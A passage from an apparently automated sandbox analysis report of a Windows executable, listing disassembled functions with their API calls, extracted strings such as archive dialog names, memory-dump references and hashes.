                                        • Opcode Fuzzy Hash: 7a2fbc1b13a9b27fe809db5fe987f60766aee66cab25564e648d864ff37f2182
                                        • Instruction Fuzzy Hash: EA31D271D14249AADF12EFA4DC45BEEBBB9AF09304F404017F905A7382D7788E64CB61
                                        Function 002EAD10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 002D1316: GetDlgItem.USER32(00000000,00003021), ref: 002D135A
                                          • Part of subcall function 002D1316: SetWindowTextW.USER32(00000000,003035F4), ref: 002D1370
                                        • EndDialog.USER32(?,00000001), ref: 002EAD98
                                        • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 002EADAD
                                        • SetDlgItemTextW.USER32(?,00000066,?), ref: 002EADC2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: ItemText$DialogWindow
                                        • String ID: ASKNEXTVOL
                                        • API String ID: 445417207-3402441367
                                        • Opcode ID: db3f20e58c34effafd362ee155fac3024e164f08699924a5cdddc62386cc0d8d
                                        • Instruction ID: 8c39bcd04756c2b793dc602d5f604c4bdde501d7d642e65052e1c316e9da4d85
                                        • Opcode Fuzzy Hash: db3f20e58c34effafd362ee155fac3024e164f08699924a5cdddc62386cc0d8d
                                        • Instruction Fuzzy Hash: 5511B1322E0241BFD7129F699C85FAA376DAB4A702F904001F241DA5A0C7A1A9259B22
                                        Function 002EDDA0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 69COMMON
                                        Download Yara Rule
                                        APIs
                                        • DialogBoxParamW.USER32(GETPASSWORD1,00010456,002EB270,?,?), ref: 002EDE18
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: DialogParam
                                        • String ID: GETPASSWORD1$r.$xz2
                                        • API String ID: 665744214-66743913
                                        • Opcode ID: c1a5943a42865194623af07a2ad468f04d0c6c319e12569314b2ec4c00747140
                                        • Instruction ID: 45a68471e089f96291bf721b2a7f15b6d63509251bf98b869b5560bd342be955
                                        • Opcode Fuzzy Hash: c1a5943a42865194623af07a2ad468f04d0c6c319e12569314b2ec4c00747140
                                        • Instruction Fuzzy Hash: E5115E326A4284AADB13DE369C45BEF339CAB0E350F548065FD45AB1C1CBB0AC94C764
                                        Function 002DD8EC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON
                                        Download Yara Rule
                                        APIs
                                        • __fprintf_l.LIBCMT ref: 002DD954
                                        • _strncpy.LIBCMT ref: 002DD99A
                                          • Part of subcall function 002E1DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00311030,00000200,002DD928,00000000,?,00000050,00311030), ref: 002E1DC4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide__fprintf_l_strncpy
                                        • String ID: $%s$@%s
                                        • API String ID: 562999700-834177443
                                        • Opcode ID: d799544ea2368b0b4c95141abf0dc0f5f7623d915b2dea18f505ccbf88edc91d
                                        • Instruction ID: 56b42efd2f4db6f49b59f412d9614bc125f3bb42565babe4bd5619562f016ac3
                                        • Opcode Fuzzy Hash: d799544ea2368b0b4c95141abf0dc0f5f7623d915b2dea18f505ccbf88edc91d
                                        • Instruction Fuzzy Hash: 4921A57256064DAEDF21EEA4CC15FEE7BACAF05300F440423F91096292E372DA68CF51
                                        Function 002E0E46 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON
                                        Download Yara Rule
                                        APIs
                                        • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,002DAC5A,00000008,?,00000000,?,002DD22D,?,00000000), ref: 002E0E85
                                        • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,002DAC5A,00000008,?,00000000,?,002DD22D,?,00000000), ref: 002E0E8F
                                        • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,002DAC5A,00000008,?,00000000,?,002DD22D,?,00000000), ref: 002E0E9F
                                        Strings
                                        • Thread pool initialization failed., xrefs: 002E0EB7
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: Create$CriticalEventInitializeSectionSemaphore
                                        • String ID: Thread pool initialization failed.
                                        • API String ID: 3340455307-2182114853
                                        • Opcode ID: a70fcf741ced737a6079b3dde8e166a917eaffa3b6bd260c6033da7baf9e1608
                                        • Instruction ID: 4bce04f7ec0c6af8774379b4bc3024de2b8c79965d3113fcbe866e574de4e0f7
                                        • Opcode Fuzzy Hash: a70fcf741ced737a6079b3dde8e166a917eaffa3b6bd260c6033da7baf9e1608
                                        • Instruction Fuzzy Hash: FE11BFB16517099FC3214F669CC89A7FBECEB69740F58482FE1CA82201D6B19D918B50
                                        Function 002D124F Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 47COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: Malloc
                                        • String ID: (.$2.$A
                                        • API String ID: 2696272793-1006441014
                                        • Opcode ID: ea4a551b00b2df9e0c89b0a63f27c7cf6c079f4905bf1e012357816f70e70b32
                                        • Instruction ID: fb7d2c078d707a595c26dcc2c64c159e4852e3e562ab01668d746d61d64e0e21
                                        • Opcode Fuzzy Hash: ea4a551b00b2df9e0c89b0a63f27c7cf6c079f4905bf1e012357816f70e70b32
                                        • Instruction Fuzzy Hash: D9011771901229ABCB15CFA4E948AEEBBFCEF09300F10416AE906E7310D7759E50CFA4
                                        Function 002EDCDD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: RENAMEDLG$REPLACEFILEDLG
                                        • API String ID: 0-56093855
                                        • Opcode ID: e00d39162b2a43e72bb41649d3edb0599e7d3a42be5c861fde05232705f66ce3
                                        • Instruction ID: c2f91171d7a259639e386b935ba8ab5f83ff2bf09216071b674389205284edf5
                                        • Opcode Fuzzy Hash: e00d39162b2a43e72bb41649d3edb0599e7d3a42be5c861fde05232705f66ce3
                                        • Instruction Fuzzy Hash: AD01B576554286AFD7138F9AFC449D67BADF70C344F508025F905C3230CE309860DBA0
                                        Function 002D1316 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 002DE2E8: _swprintf.LIBCMT ref: 002DE30E
                                          • Part of subcall function 002DE2E8: _strlen.LIBCMT ref: 002DE32F
                                          • Part of subcall function 002DE2E8: SetDlgItemTextW.USER32(?,0030E274,?), ref: 002DE38F
                                          • Part of subcall function 002DE2E8: GetWindowRect.USER32(?,?), ref: 002DE3C9
                                          • Part of subcall function 002DE2E8: GetClientRect.USER32(?,?), ref: 002DE3D5
                                        • GetDlgItem.USER32(00000000,00003021), ref: 002D135A
                                        • SetWindowTextW.USER32(00000000,003035F4), ref: 002D1370
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                        • String ID: .$0
                                        • API String ID: 2622349952-1180932613
                                        • Opcode ID: 33a4216f9cf199cce76ebe8ec8febc892389c0c76a8da42b2f07a93599010186
                                        • Instruction ID: c93f26c94f038de606fc8709349aca10c57392dfa5432ef7e8d476fd9dd88f4d
                                        • Opcode Fuzzy Hash: 33a4216f9cf199cce76ebe8ec8febc892389c0c76a8da42b2f07a93599010186
                                        • Instruction Fuzzy Hash: 9CF0AF3052438DBADF562F608C0DBEA3B5CAF04345F048196FD4454BA1CB78CDB0EA10
                                        Function 002F9A1E Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: __alldvrm$_strrchr
                                        • String ID:
                                        • API String ID: 1036877536-0
                                        • Opcode ID: 15e7b98f52cb345e5770fd34cbf54b95dbf5428e1727e1497290f0e3bad33655
                                        • Instruction ID: 2987125c1c3a18246db1889a8ff554666ee2b1be81f2c9e1f1bce5dad07c7407
                                        • Opcode Fuzzy Hash: 15e7b98f52cb345e5770fd34cbf54b95dbf5428e1727e1497290f0e3bad33655
                                        • Instruction Fuzzy Hash: C7A1487292038A9FEB26CF18C8917BEFBE5EF55390F24417ED6859B281C23589D1CB50
                                        Function 002DA354 Relevance: 6.1, APIs: 4, Instructions: 127filetimeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,002D7F69,?,?,?), ref: 002DA3FA
                                        • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,00000800,?,002D7F69,?), ref: 002DA43E
                                        • SetFileTime.KERNEL32(?,00000800,?,00000000,?,?,00000800,?,002D7F69,?,?,?,?,?,?,?), ref: 002DA4BF
                                        • CloseHandle.KERNEL32(?,?,?,00000800,?,002D7F69,?,?,?,?,?,?,?,?,?,?), ref: 002DA4C6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: File$Create$CloseHandleTime
                                        • String ID:
                                        • API String ID: 2287278272-0
                                        • Opcode ID: 2000689ebfc6d5935bc66aaf1ed831f5cec05e59a7bdbe978a06ec246464c5e3
                                        • Instruction ID: 30d5f90e9f753476987b6884cec40514489ea27f2ffca5621c27bbc39810fe7b
                                        • Opcode Fuzzy Hash: 2000689ebfc6d5935bc66aaf1ed831f5cec05e59a7bdbe978a06ec246464c5e3
                                        • Instruction Fuzzy Hash: 9C41C0312983829AD731DF24DC55FAFBBE9AB85300F04095EB5D1932C0D6B49E58DB53
                                        Function 002FC988 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,002F91E0,?,00000000,?,00000001,?,?,00000001,002F91E0,?), ref: 002FC9D5
                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 002FCA5E
                                        • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,002F6CBE,?), ref: 002FCA70
                                        • __freea.LIBCMT ref: 002FCA79
                                          • Part of subcall function 002F8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,002FCA2C,00000000,?,002F6CBE,?,00000008,?,002F91E0,?,?,?), ref: 002F8E38
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                        • String ID:
                                        • API String ID: 2652629310-0
                                        • Opcode ID: 829e9c95ab9e2d031dba957b84c6b56beca7dabc043e29657e881e7f7b2d63f7
                                        • Instruction ID: 021647f74109717b169584044d8fb7b9d02d27226cb447bde7e90581d9b22b04
                                        • Opcode Fuzzy Hash: 829e9c95ab9e2d031dba957b84c6b56beca7dabc043e29657e881e7f7b2d63f7
                                        • Instruction Fuzzy Hash: DC31AC72A2020EABDB25DF64CC51DBEBBA9EF41350B244179FD04E6290E735DD60CB90
                                        Function 002EA663 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetDC.USER32(00000000), ref: 002EA666
                                        • GetDeviceCaps.GDI32(00000000,00000058), ref: 002EA675
                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 002EA683
                                        • ReleaseDC.USER32(00000000,00000000), ref: 002EA691
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: CapsDevice$Release
                                        • String ID:
                                        • API String ID: 1035833867-0
                                        • Opcode ID: ff47dca7622c03b96ba50363311ae0537d4bbecf15cce566f140c088baaa7fd1
                                        • Instruction ID: e68f10c72e8d4629c082bc13dc8941a3de874de6c6712488065af94a35f9d96c
                                        • Opcode Fuzzy Hash: ff47dca7622c03b96ba50363311ae0537d4bbecf15cce566f140c088baaa7fd1
                                        • Instruction Fuzzy Hash: 49E0EC31952722A7D6665B61AC8DBCA3E5CAB09B52F418201FA069A190DF6486408BA5
                                        Function 002ED06A Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 278COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: _wcschr
                                        • String ID: .lnk$d.
                                        • API String ID: 2691759472-2041913575
                                        • Opcode ID: 03f188c14bfd6b889d0eb62bb81f9d65ad6f90eedd5a158bef4fbf0adbdb69a0
                                        • Instruction ID: 97cb40263aeda66db8a54a11ff5bb00ad55a4101a2e6d3fffa502d8e769b858e
                                        • Opcode Fuzzy Hash: 03f188c14bfd6b889d0eb62bb81f9d65ad6f90eedd5a158bef4fbf0adbdb69a0
                                        • Instruction Fuzzy Hash: 88A1907286026A9ADF35DBA1CD45EFA73FCAF04300F4881A2F509E7141EE749B958F60
                                        Function 002D75DE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137timeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 002D75E3
                                          • Part of subcall function 002E05DA: _wcslen.LIBCMT ref: 002E05E0
                                          • Part of subcall function 002DA56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 002DA598
                                        • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 002D777F
                                          • Part of subcall function 002DA4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,002DA325,?,?,?,002DA175,?,00000001,00000000,?,?), ref: 002DA501
                                          • Part of subcall function 002DA4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,002DA325,?,?,?,002DA175,?,00000001,00000000,?,?), ref: 002DA532
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: File$Attributes$CloseFindH_prologTime_wcslen
                                        • String ID: :
                                        • API String ID: 3226429890-336475711
                                        • Opcode ID: 84d9d56c56c69c052af2fe2ae5e6c0f54975fb29613af011f6e36622a6722e8a
                                        • Instruction ID: 6eee4efe175e0d8dca1b1b569aa7a13956fc19550f75e2f2c5ebb64d94ec03e1
                                        • Opcode Fuzzy Hash: 84d9d56c56c69c052af2fe2ae5e6c0f54975fb29613af011f6e36622a6722e8a
                                        • Instruction Fuzzy Hash: A4419371811158A9EB25EB64CC59EEEB37CAF55300F404097B609A3292EB745F95CF60
                                        Function 002DB37A Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 127COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: _wcschr
                                        • String ID: *
                                        • API String ID: 2691759472-163128923
                                        • Opcode ID: 469db590fd42c1805208f612485e94937c424d350a132cd10491963a9d09d7c9
                                        • Instruction ID: 6b7193bd70b8d18ca4d911174ae2cc6668a4f1d1131dc5e2d386cea120ca5ede
                                        • Opcode Fuzzy Hash: 469db590fd42c1805208f612485e94937c424d350a132cd10491963a9d09d7c9
                                        • Instruction Fuzzy Hash: 0E314626568302DACB32EE148932A7B73E4DF95B64F17801FFD8447343E7668C61A361
                                        Function 002EB48E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: _wcslen
                                        • String ID: }
                                        • API String ID: 176396367-4239843852
                                        • Opcode ID: ff94fb0fe6046b63263bbe244dfedc178aa49a65d80591bd2cb2cb544de945f0
                                        • Instruction ID: 7ebb8aa90adfc7f4426d4c73190600c54332be99b9c696611e844c9c82ecc138
                                        • Opcode Fuzzy Hash: ff94fb0fe6046b63263bbe244dfedc178aa49a65d80591bd2cb2cb544de945f0
                                        • Instruction Fuzzy Hash: 8721237296438B5AD732EE65D845E7BB3ECDF90750F80042AF640C3141EB65DE688BB2
                                        Function 002DF344 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 67COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 002DF2C5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 002DF2E4
                                          • Part of subcall function 002DF2C5: GetProcAddress.KERNEL32(003181C8,CryptUnprotectMemory), ref: 002DF2F4
                                        • GetCurrentProcessId.KERNEL32(?,?,?,002DF33E), ref: 002DF3D2
                                        Strings
